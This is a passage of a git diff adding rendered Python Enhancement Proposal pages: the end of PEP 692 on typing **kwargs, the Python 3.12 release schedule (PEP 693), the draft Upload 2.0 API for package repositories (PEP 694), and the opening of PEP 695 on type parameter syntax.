Therefore, in order to be compatible with the new use case, Unpack’s +repr should be changed to simply Unpack[T].

+
+
+
+

Intended Usage

+

The intended use cases for this proposal are described in the +Motivation section. In summary, more precise **kwargs typing +can bring benefits to already existing codebases that decided to use +**kwargs initially, but now are mature enough to use a stricter contract +via type hints. Using **kwargs can also help in reducing code duplication +and the amount of copy-pasting needed when there is a bunch of functions that +require the same set of keyword arguments. Finally, **kwargs are useful for +cases when a function needs to facilitate optional keyword arguments that don’t +have obvious default values.

+

However, it has to be pointed out that in some cases there are better tools +for the job than using TypedDict to type **kwargs as proposed in this +PEP. For example, when writing new code if all the keyword arguments are +required or have default values then writing everything explicitly is better +than using **kwargs and a TypedDict:

+
def foo(name: str, year: int): ...     # Preferred way.
+def foo(**kwargs: Unpack[Movie]): ...
+
+
+

Similarly, when type hinting third party libraries via stubs it is again better +to state the function signature explicitly - this is the only way to type such +a function if it has default arguments. Another issue that may arise in this +case when trying to type hint the function with a TypedDict is that some +standard function parameters may be treated as keyword only:

+
def foo(name, year): ...              # Function in a third party library.
+
+def foo(Unpack[Movie]): ...           # Function signature in a stub file.
+
+foo("Life of Brian", 1979)            # This would be now failing type
+                                      # checking but is fine.
+
+foo(name="Life of Brian", year=1979)  # This would be the only way to call
+                                      # the function now that passes type
+                                      # checking.
+
+
+

Therefore, in this case it is again preferred to type hint such function +explicitly as:

+
def foo(name: str, year: int): ...
+
+
+

Also, for the benefit of IDEs and documentation pages, functions that are part +of the public API should prefer explicit keyword parameters whenever possible.

+
+
+

How to Teach This

+

This PEP could be linked in the typing module’s documentation. Moreover, a +new section on using Unpack could be added to the aforementioned docs. +Similar sections could be also added to the +mypy documentation and the +typing RTD documentation.

+
+
+

Reference Implementation

+

The mypy type checker already +supports more precise +**kwargs typing using Unpack.

+

Pyright type checker also +provides provisional support +for this feature.

+
+
+

Rejected Ideas

+
+

TypedDict unions

+

It is possible to create unions of typed dictionaries. However, supporting +typing **kwargs with a union of typed dicts would greatly increase the +complexity of the implementation of this PEP and there seems to be no +compelling use case to justify the support for this. Therefore, using unions of +typed dictionaries to type **kwargs as described in the context of this PEP +can result in an error:

+
class Book(TypedDict):
+    genre: str
+    pages: int
+
+TypedDictUnion = Movie | Book
+
+def foo(**kwargs: Unpack[TypedDictUnion]) -> None: ...  # WRONG! Unsupported use
+                                                        # of a union of
+                                                        # TypedDicts to type
+                                                        # **kwargs
+
+
+

Instead, a function that expects a union of TypedDicts can be +overloaded:

+
@overload
+def foo(**kwargs: Unpack[Movie]): ...
+
+@overload
+def foo(**kwargs: Unpack[Book]): ...
+
+
+
+
+

Changing the meaning of **kwargs annotations

+

One way to achieve the purpose of this PEP would be to change the +meaning of **kwargs annotations, so that the annotations would +apply to the entire **kwargs dict, not to individual elements. +For consistency, we would have to make an analogous change to *args +annotations.

+

This idea was discussed in a meeting of the typing community, and the +consensus was that the change would not be worth the cost. There is no +clear migration path, the current meaning of *args and **kwargs +annotations is well-established in the ecosystem, and type checkers +would have to introduce new errors for code that is currently legal.

+
+
+

Introducing a new syntax

+

In the previous versions of this PEP, using a double asterisk syntax was +proposed to support more precise **kwargs typing. Using this syntax, +functions could be annotated as follows:

+
def foo(**kwargs: **Movie): ...
+
+
+

Which would have the same meaning as:

+
def foo(**kwargs: Unpack[Movie]): ...
+
+
+

This greatly increased the scope of the PEP, as it would require a grammar +change and adding a new dunder for the Unpack special form. At the same +the justification for introducing a new syntax was not strong enough and +became a blocker for the whole PEP. Therefore, we decided to abandon the idea +of introducing a new syntax as a part of this PEP and may propose it again in a +separate one.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0692.rst

+

Last modified: 2024-02-16 16:12:21 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0693/index.html b/pep-0693/index.html new file mode 100644 index 00000000000..5c33c43ae8b --- /dev/null +++ b/pep-0693/index.html @@ -0,0 +1,229 @@ + + + + + + + + PEP 693 – Python 3.12 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 693 – Python 3.12 Release Schedule

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
24-May-2022
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.12.

+
+
+

Release Manager and Crew

+
    +
  • 3.12 Release Manager: Thomas Wouters
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.12.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.12 development begins: Sunday, 2022-05-08
  • +
  • 3.12.0 alpha 1: Monday, 2022-10-24
  • +
  • 3.12.0 alpha 2: Monday, 2022-11-14
  • +
  • 3.12.0 alpha 3: Tuesday, 2022-12-06
  • +
  • 3.12.0 alpha 4: Tuesday, 2023-01-10
  • +
  • 3.12.0 alpha 5: Tuesday, 2023-02-07
  • +
  • 3.12.0 alpha 6: Tuesday, 2023-03-07
  • +
  • 3.12.0 alpha 7: Tuesday, 2023-04-04
  • +
  • 3.12.0 beta 1: Monday, 2023-05-22 +(No new features beyond this point.)
  • +
  • 3.12.0 beta 2: Tuesday, 2023-06-06
  • +
  • 3.12.0 beta 3: Monday, 2023-06-19
  • +
  • 3.12.0 beta 4: Tuesday, 2023-07-11
  • +
  • 3.12.0 candidate 1: Sunday, 2023-08-06
  • +
  • 3.12.0 candidate 2: Wednesday, 2023-09-06
  • +
  • 3.12.0 candidate 3: Tuesday, 2023-09-19
  • +
  • 3.12.0 final: Monday, 2023-10-02
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.12.1: Thursday, 2023-12-07
  • +
  • 3.12.2: Tuesday, 2024-02-06
  • +
  • 3.12.3: Tuesday, 2024-04-09
  • +
  • 3.12.4: Thursday, 2024-06-06
  • +
  • 3.12.5: Tuesday, 2024-08-06
  • +
  • 3.12.6: Friday, 2024-09-06
  • +
  • 3.12.7: Tuesday, 2024-10-01
  • +
  • 3.12.8: Tuesday, 2024-12-03
  • +
+

Expected:

+
    +
  • 3.12.9: Tuesday, 2025-02-04
  • +
  • 3.12.10: Tuesday, 2025-04-08
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an as-needed basis until October 2028.

+
+
+

3.12 Lifespan

+

3.12 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.13.0 final, +the ninth and final 3.12 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.12.0 final, so until approximately +October 2028.

+
+
+
+

Features for 3.12

+

New features can be found in What’s New In Python 3.12.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0693.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0694/index.html b/pep-0694/index.html new file mode 100644 index 00000000000..4ca1531c0e2 --- /dev/null +++ b/pep-0694/index.html @@ -0,0 +1,784 @@ + + + + + + + + PEP 694 – Upload 2.0 API for Python Package Repositories | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 694 – Upload 2.0 API for Python Package Repositories

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
11-Jun-2022
+
Post-History:
+
27-Jun-2022
+
+
+
+
Table of Contents +
+
+

Abstract

+

There is currently no standardized API for uploading files to a Python package +repository such as PyPI. Instead, everyone has been forced to reverse engineer +the non-standard API from PyPI.

+

That API, while functional, leaks a lot of implementation details of the original +PyPI code base, which have now had to have been faithfully replicated in the new +code base, and alternative implementations.

+

Beyond the above, there are a number of major issues with the current API:

+
    +
  • It is a fully synchronous API, which means that we’re forced to have a single +request being held open for potentially a long time, both for the upload itself, +and then while the repository processes the uploaded file to determine success +or failure.
  • +
  • It does not support any mechanism for resuming an upload, with the largest file +size on PyPI being just under 1GB in size, that’s a lot of wasted bandwidth if +a large file has a network blip towards the end of an upload.
  • +
  • It treats a single file as the atomic unit of operation, which can be problematic +when a release might have multiple binary wheels which can cause people to get +different versions while the files are uploading, and if the sdist happens to +not go last, possibly some hard to build packages are attempting to be built +from source.
  • +
  • It has very limited support for communicating back to the user, with no support +for multiple errors, warnings, deprecations, etc. It is limited entirely to the +HTTP status code and reason phrase, of which the reason phrase has been +deprecated since HTTP/2 (RFC 7540).
  • +
  • The metadata for a release/file is submitted alongside the file, however this +metadata is famously unreliable, and most installers instead choose to download +the entire file and read that in part due to that unreliability.
  • +
  • There is no mechanism for allowing a repository to do any sort of sanity +checks before bandwidth starts getting expended on an upload, whereas a lot +of the cases of invalid metadata or incorrect permissions could be checked +prior to upload.
  • +
  • It has no support for “staging” a draft release prior to publishing it to the +repository.
  • +
  • It has no support for creating new projects, without uploading a file.
  • +
+

This PEP proposes a new API for uploads, and deprecates the existing non standard +API.

+
+
+

Status Quo

+

This does not attempt to be a fully exhaustive documentation of the current API, but +give a high level overview of the existing API.

+
+

Endpoint

+

The existing upload API (and the now removed register API) lives at an url, currently +https://upload.pypi.org/legacy/, and to communicate which specific API you want +to call, you add a :action url parameter with a value of file_upload. The values +of submit, submit_pkg_info, and doc_upload also used to be supported, but +no longer are.

+

It also has a protocol_version parameter, in theory to allow new versions of the +API to be written, but in practice that has never happened, and the value is always +1.

+

So in practice, on PyPI, the endpoint is +https://upload.pypi.org/legacy/?:action=file_upload&protocol_version=1.

+
+
+

Encoding

+

The data to be submitted is submitted as a POST request with the content type +of multipart/form-data. This is due to the historical nature, that this API +was not actually designed as an API, but rather was a form on the initial PyPI +implementation, then client code was written to programmatically submit that form.

+
+
+

Content

+

Roughly speaking, the metadata contained within the package is submitted as parts +where the content-disposition is form-data, and the name is the name of the +field. The names of these various pieces of metadata are not documented, and they +sometimes, but not always match the names used in the METADATA files. The casing +rarely matches though, but overall the METADATA to form-data conversion is +extremely inconsistent.

+

The file itself is then sent as a application/octet-stream part with the name +of content, and if there is a PGP signature attached, then it will be included +as a application/octet-stream part with the name of gpg_signature.

+
+
+
+

Specification

+

This PEP traces the root cause of most of the issues with the existing API to be +roughly two things:

+
    +
  • The metadata is submitted alongside the file, rather than being parsed from the +file itself.
      +
    • This is actually fine if used as a pre-check, but it should be validated +against the actual METADATA or similar files within the distribution.
    • +
    +
  • +
  • It supports a single request, using nothing but form data, that either succeeds +or fails, and everything is done and contained within that single request.
  • +
+

We then propose a multi-request workflow, that essentially boils down to:

+
    +
  1. Initiate an upload session.
  2. +
  3. Upload the file(s) as part of the upload session.
  4. +
  5. Complete the upload session.
  6. +
  7. (Optional) Check the status of an upload session.
  8. +
+

All URLs described here will be relative to the root endpoint, which may be +located anywhere within the url structure of a domain. So it could be at +https://upload.example.com/, or https://example.com/upload/.

+
+

Versioning

+

This PEP uses the same MAJOR.MINOR versioning system as used in PEP 691, +but it is otherwise independently versioned. The existing API is considered by +this spec to be version 1.0, but it otherwise does not attempt to modify +that API in any way.

+
+
+

Endpoints

+
+

Create an Upload Session

+

To create a new upload session, you can send a POST request to /, +with a payload that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "name": "foo",
+  "version": "1.0"
+}
+
+
+

This currently has three keys, meta, name, and version.

+

The meta key is included in all payloads, and it describes information about the +payload itself.

+

The name key is the name of the project that this session is attempting to +add files to.

+

The version key is the version of the project that this session is attepmting to +add files to.

+

If creating the session was successful, then the server must return a response +that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "urls": {
+    "upload": "...",
+    "draft": "...",
+    "publish": "..."
+  },
+  "valid-for": 604800,
+  "status": "pending",
+  "files": {},
+  "notices": [
+    "a notice to display to the user"
+  ]
+}
+
+
+

Besides the meta key, this response has five keys, urls, valid-for, +status, files, and notices.

+

The urls key is a dictionary mapping identifiers to related URLs to this +session.

+

The valid-for key is an integer representing how long, in seconds, until the +server itself will expire this session (and thus all of the URLs contained in it). +The session SHOULD live at least this much longer unless the client itself +has canceled the session. Servers MAY choose to increase this time, but should +never decrease it, except naturally through the passage of time.

+

The status key is a string that contains one of pending, published, +errored, or canceled, this string represents the overall status of +the session.

+

The files key is a mapping containing the filenames that have been uploaded +to this session, to a mapping containing details about each file.

+

The notices key is an optional key that points to an array of notices that +the server wishes to communicate to the end user that are not specific to any +one file.

+

For each filename in files the mapping has three keys, status, url, +and notices.

+

The status key is the same as the top level status key, except that it +indicates the status of a specific file.

+

The url key is the absolute URL that the client should upload that specific +file to (or use to delete that file).

+

The notices key is an optional key, that is an array of notices that the server +wishes to communicate to the end user that are specific to this file.

+

The required response code to a successful creation of the session is a +201 Created response and it MUST include a Location header that is the +URL for this session, which may be used to check its status or cancel it.

+

For the urls key, there are currently three keys that may appear:

+

The upload key, which is the upload endpoint for this session to initiate +a file upload.

+

The draft key, which is the repository URL that these files are available at +prior to publishing.

+

The publish key, which is the endpoint to trigger publishing the session.

+

In addition to the above, if a second session is created for the same name+version +pair, then the upload server MUST return the already existing session rather +than creating a new, empty one.

+
+
+

Upload Each File

+

Once you have initiated an upload session for one or more files, then you have +to actually upload each of those files.

+

There is no set endpoint for actually uploading the file, that is given to the +client by the server as part of the creation of the upload session, and clients +MUST NOT assume that there is any commonality to what those URLs look like from +one session to the next.

+

To initiate a file upload, a client sends a POST request to the upload URL +in the session, with a request body that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "filename": "foo-1.0.tar.gz",
+  "size": 1000,
+  "hashes": {"sha256": "...", "blake2b": "..."},
+  "metadata": "..."
+}
+
+
+

Besides the standard meta key, this currently has 4 keys:

+
    +
  • filename: The filename of the file being uploaded.
  • +
  • size: The size, in bytes, of the file that is being uploaded.
  • +
  • hashes: A mapping of hash names to hex encoded digests, each of these digests +are the digests of that file, when hashed by the hash identified in the name.

    By default, any hash algorithm available via hashlib (specifically any that can +be passed to hashlib.new() and do not require additional parameters) can +be used as a key for the hashes dictionary. At least one secure algorithm from +hashlib.algorithms_guaranteed MUST always be included. At the time +of this PEP, sha256 specifically is recommended.

    +

    Multiple hashes may be passed at a time, but all hashes must be valid for the +file.

    +
  • +
  • metadata: An optional key that is a string containing the file’s +core metadata.
  • +
+

Servers MAY use the data provided in this response to do some sanity checking +prior to allowing the file to be uploaded, which may include but is not limited +to:

+
    +
  • Checking if the filename already exists.
  • +
  • Checking if the size would invalidate some quota.
  • +
  • Checking if the contents of the metadata, if provided, are valid.
  • +
+

If the server determines that the client should attempt the upload, it will return +a 201 Created response, with an empty body, and a Location header pointing +to the URL that the file itself should be uploaded to.

+

At this point, the status of the session should show the filename, with the above url +included in it.

+
+
Upload Data
+

To upload the file, a client has two choices, they may upload the file as either +a single chunk, or as multiple chunks. Either option is acceptable, but it is +recommended that most clients should choose to upload each file as a single chunk +as that requires fewer requests and typically has better performance.

+

However for particularly large files, uploading within a single request may result +in timeouts, so larger files may need to be uploaded in multiple chunks.

+

In either case, the client must generate a unique token (or nonce) for each upload +attempt for a file, and MUST include that token in each request in the Upload-Token +header. The Upload-Token is a binary blob encoded using base64 surrounded by +a : on either side. Clients SHOULD use at least 32 bytes of cryptographically +random data. You can generate it using the following:

+
import base64
+import secrets
+
+header = ":" + base64.b64encode(secrets.token_bytes(32)).decode() + ":"
+
+
+

The one time that it is permissible to omit the Upload-Token from an upload +request is when a client wishes to opt out of the resumable or chunked file upload +feature completely. In that case, they MAY omit the Upload-Token, and the +file must be successfully uploaded in a single HTTP request, and if it fails, the +entire file must be resent in another single HTTP request.

+

To upload in a single chunk, a client sends a POST request to the URL from the +session response for that filename. The client MUST include a Content-Length +header that is equal to the size of the file in bytes, and this MUST match the +size given in the original session creation.

+

As an example, if uploading a 100,000 byte file, you would send headers like:

+
Content-Length: 100000
+Upload-Token: :nYuc7Lg2/Lv9S4EYoT9WE6nwFZgN/TcUXyk9wtwoABg=:
+
+
+

If the upload completes successfully, the server MUST respond with a +201 Created status. At this point this file MUST not be present in the +repository, but merely staged until the upload session has completed.

+

To upload in multiple chunks, a client sends multiple POST requests to the same +URL as before, one for each chunk.

+

This time however, the Content-Length is equal to the size, in bytes, of the +chunk that they are sending. In addition, the client MUST include a +Upload-Offset header which indicates a byte offset that the content included +in this request starts at and a Upload-Incomplete header set to 1.

+

As an example, if uploading a 100,000 byte file in 1000 byte chunks, and this chunk +represents bytes 1001 through 2000, you would send headers like:

+
Content-Length: 1000
+Upload-Token: :nYuc7Lg2/Lv9S4EYoT9WE6nwFZgN/TcUXyk9wtwoABg=:
+Upload-Offset: 1001
+Upload-Incomplete: 1
+
+
+

However, the final chunk of data omits the Upload-Incomplete header, since +at that point the upload is no longer incomplete.

+

For each successful chunk, the server MUST respond with a 202 Accepted +header, except for the final chunk, which MUST be a 201 Created.

+

The following constraints are placed on uploads regardless of whether they are +single chunk or multiple chunks:

+
    +
  • A client MUST NOT perform multiple POST requests in parallel for the +same file to avoid race conditions and data loss or corruption. The server +MAY terminate any ongoing POST request that utilizes the same +Upload-Token.
  • +
  • If the offset provided in Upload-Offset is not 0 or the next chunk +in an incomplete upload, then the server MUST respond with a 409 Conflict.
  • +
  • Once an upload has started with a specific token, you may not use another token +for that file without deleting the in progress upload.
  • +
  • Once a file has uploaded successfully, you may initiate another upload for +that file, and doing so will replace that file.
  • +
+
+
+
Resume Upload
+

To resume an upload, you first have to know how much of the data the server has +already received, regardless of if you were originally uploading the file as +a single chunk, or in multiple chunks.

+

To get the status of an individual upload, a client can make a HEAD request +with their existing Upload-Token to the same URL they were uploading to.

+

The server MUST respond back with a 204 No Content response, with an +Upload-Offset header that indicates what offset the client should continue +uploading from. If the server has not received any data, then this would be 0, +if it has received 1007 bytes then it would be 1007.

+

Once the client has retrieved the offset that they need to start from, they can +upload the rest of the file as described above, either in a single request +containing all of the remaining data or in multiple chunks.

+
+
+
Canceling an In Progress Upload
+

If a client wishes to cancel an upload of a specific file, for instance because +they need to upload a different file, they may do so by issuing a DELETE +request to the file upload URL with the Upload-Token used to upload the +file in the first place.

+

A successful cancellation request MUST response with a 204 No Content.

+
+
+
Delete an uploaded File
+

Already uploaded files may be deleted by issuing a DELETE request to the file +upload URL without the Upload-Token.

+

A successful deletion request MUST response with a 204 No Content.

+
+
+
+

Session Status

+

Similarly to file upload, the session URL is provided in the response to +creating the upload session, and clients MUST NOT assume that there is any +commonality to what those URLs look like from one session to the next.

+

To check the status of a session, clients issue a GET request to the +session URL, to which the server will respond with the same response that +they got when they initially created the upload session, except with any +changes to status, valid-for, or updated files reflected.

+
+
+

Session Cancellation

+

To cancel an upload session, a client issues a DELETE request to the +same session URL as before. At which point the server marks the session as +canceled, MAY purge any data that was uploaded as part of that session, +and future attempts to access that session URL or any of the file upload URLs +MAY return a 404 Not Found.

+

To prevent a lot of dangling sessions, servers may also choose to cancel a +session on their own accord. It is recommended that servers expunge their +sessions after no less than a week, but each server may choose their own +schedule.

+
+
+

Session Completion

+

To complete a session, and publish the files that have been included in it, +a client MUST send a POST request to the publish url in the +session status payload.

+

If the server is able to immediately complete the session, it may do so +and return a 201 Created response. If it is unable to immediately +complete the session (for instance, if it needs to do processing that may +take longer than reasonable in a single HTTP request), then it may return +a 202 Accepted response.

+

In either case, the server should include a Location header pointing +back to the session status url, and if the server returned a 202 Accepted, +the client may poll that URL to watch for the status to change.

+
+
+
+

Errors

+

All Error responses that contain a body will have a body that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "message": "...",
+  "errors": [
+    {
+      "source": "...",
+      "message": "..."
+    }
+  ]
+}
+
+
+

Besides the standard meta key, this has two top level keys, message +and errors.

+

The message key is a singular message that encapsulates all errors that +may have happened on this request.

+

The errors key is an array of specific errors, each of which contains +a source key, which is a string that indicates what the source of the +error is, and a message key for that specific error.

+

The message and source strings do not have any specific meaning, and +are intended for human interpretation to figure out what the underlying issue +was.

+
+
+

Content-Types

+

Like PEP 691, this PEP proposes that all requests and responses from the +Upload API will have a standard content type that describes what the content +is, what version of the API it represents, and what serialization format has +been used.

+

The structure of this content type will be:

+
application/vnd.pypi.upload.$version+format
+
+
+

Since only major versions should be disruptive to systems attempting to +understand one of these API content bodies, only the major version will be +included in the content type, and will be prefixed with a v to clarify +that it is a version number.

+

Unlike PEP 691, this PEP does not change the existing 1.0 API in any +way, so servers will be required to host the new API described in this PEP at +a different endpoint than the existing upload API.

+

Which means that for the new 2.0 API, the content types would be:

+
    +
  • JSON: application/vnd.pypi.upload.v2+json
  • +
+

In addition to the above, a special “meta” version is supported named latest, +whose purpose is to allow clients to request the absolute latest version, without +having to know ahead of time what that version is. It is recommended however, +that clients be explicit about what versions they support.

+

These content types DO NOT apply to the file uploads themselves, only to the +other API requests/responses in the upload API. The files themselves should use +the application/octet-stream content-type.

+
+
+

Version + Format Selection

+

Again similar to PEP 691, this PEP standardizes on using server-driven +content negotiation to allow clients to request different versions or +serialization formats, which includes the format url parameter.

+

Since this PEP expects the existing legacy 1.0 upload API to exist at a +different endpoint, and it currently only provides for JSON serialization, this +mechanism is not particularly useful, and clients only have a single version and +serialization they can request. However clients SHOULD be setup to handle +content negotiation gracefully in the case that additional formats or versions +are added in the future.

+
+
+
+

FAQ

+
+

Does this mean PyPI is planning to drop support for the existing upload API?

+

At this time PyPI does not have any specific plans to drop support for the +existing upload API.

+

Unlike with PEP 691 there are wide benefits to doing so, so it is likely +that we will want to drop support for it at some point in the future, but +until this API is implemented, and receiving broad use it would be premature +to make any plans for actually dropping support for it.

+
+
+

Is this Resumable Upload protocol based on anything?

+

Yes!

+

It’s actually the protocol specified in an +Active Internet-Draft, +where the authors took what they learned implementing tus +to provide the idea of resumable uploads in a wholly generic, standards based +way.

+

The only deviation we’ve made from that spec is that we don’t use the +104 Upload Resumption Supported informational response in the first +POST request. This decision was made for a few reasons:

+
    +
  • The 104 Upload Resumption Supported is the only part of that draft +which does not rely entirely on things that are already supported in the +existing standards, since it was adding a new informational status.
  • +
  • Many clients and web frameworks don’t support 1xx informational +responses in a very good way, if at all, adding it would complicate +implementation for very little benefit.
  • +
  • The purpose of the 104 Upload Resumption Supported support is to allow +clients to determine that an arbitrary endpoint that they’re interacting +with supports resumable uploads. Since this PEP is mandating support for +that in servers, clients can just assume that the server they are +interacting with supports it, which makes using it unneeded.
  • +
  • In theory, if the support for 1xx responses got resolved and the draft +gets accepted with it in, we can add that in at a later date without +changing the overall flow of the API.
  • +
+

There is a risk that the above draft doesn’t get accepted, but even if it +does not, that doesn’t actually affect us. It would just mean that our +support for resumable uploads is an application specific protocol, but is +still wholly standards compliant.

+
+
+
+

Open Questions

+
+

Multipart Uploads vs tus

+

This PEP currently bases the actual uploading of files on an internet draft +from tus.io that supports resumable file uploads.

+

That protocol requires a few things:

+
    +
  • That the client selects a secure Upload-Token that they use to identify +uploading a single file.
  • +
  • That if clients don’t upload the entire file in one shot, that they have +to submit the chunks serially, and in the correct order, with all but the +final chunk having a Upload-Incomplete: 1 header.
  • +
  • Resumption of an upload is essentially just querying the server to see how +much data they’ve gotten, then sending the remaining bytes (either as a single +request, or in chunks).
  • +
  • The upload implicitly is completed when the server successfully gets all of +the data from the client.
  • +
+

This has one big benefit, that if a client doesn’t care about resuming their +download, the work to support, from a client side, resumable uploads is able +to be completely ignored. They can just POST the file to the URL, and if +it doesn’t succeed, they can just POST the whole file again.

+

The other benefit is that even if you do want to support resumption, you can +still just POST the file, and unless you need to resume the download, +that’s all you have to do.

+

Another, possibly theoretical, benefit is that for hashing the uploaded files, +the serial chunks requirement means that the server can maintain hashing state +between requests, update it for each request, then write that file back to +storage. Unfortunately this isn’t actually possible to do with Python’s hashlib, +though there are some libraries like Rehash +that implement it, but they don’t support every hash that hashlib does +(specifically not blake2 or sha3 at the time of writing).

+

We might also need to reconstitute the download for processing anyways to do +things like extract metadata, etc from it, which would make it a moot point.

+

The downside is that there is no ability to parallelize the upload of a single +file because each chunk has to be submitted serially.

+

AWS S3 has a similar API (and most blob stores have copied it either wholesale +or something like it) which they call multipart uploading.

+

The basic flow for a multipart upload is:

+
    +
  1. Initiate a Multipart Upload to get an Upload ID.
  2. +
  3. Break your file up into chunks, and upload each one of them individually.
  4. +
  5. Once all chunks have been uploaded, finalize the upload. +- This is the step where any errors would occur.
  6. +
+

It does not directly support resuming an upload, but it allows clients to +control the “blast radius” of failure by adjusting the size of each part +they upload, and if any of the parts fail, they only have to resend those +specific parts.

+

This has a big benefit in that it allows parallelization in uploading files, +allowing clients to maximize their bandwidth using multiple threads to send +the data.

+

We wouldn’t need an explicit step (1), because our session would implicitly +initiate a multipart upload for each file.

+

It does have its own downsides:

+
    +
  • Clients have to do more work on every request to have something resembling +resumable uploads. They would have to break the file up into multiple parts +rather than just making a single POST request, and only needing to deal +with the complexity if something fails.
  • +
  • Clients that don’t care about resumption at all still have to deal with +the third explicit step, though they could just upload the file all as a +single part.
      +
    • S3 works around this by having another API for one shot uploads, but +I’d rather not have two different APIs for uploading the same file.
    • +
    +
  • +
  • Verifying hashes gets somewhat more complicated. AWS implements hashing +multipart uploads by hashing each part, then the overall hash is just a +hash of those hashes, not of the content itself. We need to know the +actual hash of the file itself for PyPI, so we would have to reconstitute +the file and read its content and hash it once it’s been fully uploaded, +though we could still use the hash of hashes trick for checksumming the +upload itself.
      +
    • See above about whether this is actually a downside in practice, or +if it’s just in theory.
    • +
    +
  • +
+

I lean towards the tus style resumable uploads as I think they’re simpler +to use and to implement, and the main downside is that we possibly leave +some multi-threaded performance on the table, which I think that I’m +personally fine with?

+

I guess one additional benefit of the S3 style multi part uploads is that +you don’t have to try and do any sort of protection against parallel uploads, +since they’re just supported. That alone might erase most of the server side +implementation simplification.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0694.rst

+

Last modified: 2024-07-10 21:28:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0695/index.html b/pep-0695/index.html new file mode 100644 index 00000000000..9f7339ae41f --- /dev/null +++ b/pep-0695/index.html @@ -0,0 +1,1707 @@ + + + + + + + + PEP 695 – Type Parameter Syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 695 – Type Parameter Syntax

+
+
Author:
+
Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
15-Jun-2022
+
Python-Version:
+
3.12
+
Post-History:
+
20-Jun-2022, +04-Dec-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Variance Inference, +Type aliases, +Type parameter lists, +The type statement and +Annotation scopes. for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP specifies an improved syntax for specifying type parameters within +a generic class, function, or type alias. It also introduces a new statement +for declaring type aliases.

+
+
+

Motivation

+

PEP 484 introduced type variables into the language. PEP 612 built +upon this concept by introducing parameter specifications, and +PEP 646 added variadic type variables.

+

While generic types and type parameters have grown in popularity, the +syntax for specifying type parameters still feels “bolted on” to Python. +This is a source of confusion among Python developers.

+

There is consensus within the Python static typing community that it is time +to provide a formal syntax that is similar to other modern programming +languages that support generic types.

+

An analysis of 25 popular typed Python libraries revealed that type +variables (in particular, the typing.TypeVar symbol) were used in +14% of modules.

+
+

Points of Confusion

+

While the use of type variables has become widespread, the manner in which +they are specified within code is the source of confusion among many +Python developers. There are a couple of factors that contribute to this +confusion.

+

The scoping rules for type variables are difficult to understand. Type +variables are typically allocated within the global scope, but their semantic +meaning is valid only when used within the context of a generic class, +function, or type alias. A single runtime instance of a type variable may be +reused in multiple generic contexts, and it has a different semantic meaning +in each of these contexts. This PEP proposes to eliminate this source of +confusion by declaring type parameters at a natural place within a class, +function, or type alias declaration statement.

+

Generic type aliases are often misused because it is not clear to developers +that a type argument must be supplied when the type alias is used. This leads +to an implied type argument of Any, which is rarely the intent. This PEP +proposes to add new syntax that makes generic type alias declarations +clear.

+

PEP 483 and PEP 484 introduced the concept of “variance” for a type +variable used within a generic class. Type variables can be invariant, +covariant, or contravariant. The concept of variance is an advanced detail +of type theory that is not well understood by most Python developers, yet +they must confront this concept today when defining their first generic +class. This PEP largely eliminates the need for most developers +to understand the concept of variance when defining generic classes.

+

When more than one type parameter is used with a generic class or type alias, +the rules for type parameter ordering can be confusing. It is normally based on +the order in which they first appear within a class or type alias declaration +statement. However, this can be overridden in a class definition by +including a “Generic” or “Protocol” base class. For example, in the class +declaration class ClassA(Mapping[K, V]), the type parameters are +ordered as K and then V. However, in the class declaration +class ClassB(Mapping[K, V], Generic[V, K]), the type parameters are +ordered as V and then K. This PEP proposes to make type parameter +ordering explicit in all cases.

+

The practice of sharing a type variable across multiple generic contexts +creates other problems today. Modern editors provide features like “find +all references” and “rename all references” that operate on symbols at the +semantic level. When a type parameter is shared among multiple generic +classes, functions, and type aliases, all references are semantically +equivalent.

+

